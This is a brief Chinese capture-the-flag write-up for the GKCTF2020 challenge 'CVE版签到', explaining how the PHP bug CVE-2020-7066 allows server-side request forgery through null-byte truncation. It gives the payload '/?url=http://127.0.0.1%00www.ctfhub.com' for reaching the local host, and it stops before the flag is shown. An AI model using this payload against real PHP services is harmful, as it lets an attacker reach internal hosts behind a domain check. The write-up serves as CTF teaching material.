GKCTF2020 - CVE版签到

CVE版签到

这道题主要考察的是cve-2020-7066，ssrf 漏洞

https://www.anquanke.com/vul/id/1966253

https://bugs.php.net/bug.php?id=79329

利用方法：

通过\0截断，访问本地主机，题目这里是使用%00截断

/?url=http://127.0.0.1%00www.ctfhub.com

提示以网址123结尾，构造的flag：

标签：php,签到,GKCTF2020,https,CVE,com,id
来源： https://www.cnblogs.com/echoDetected/p/12963626.html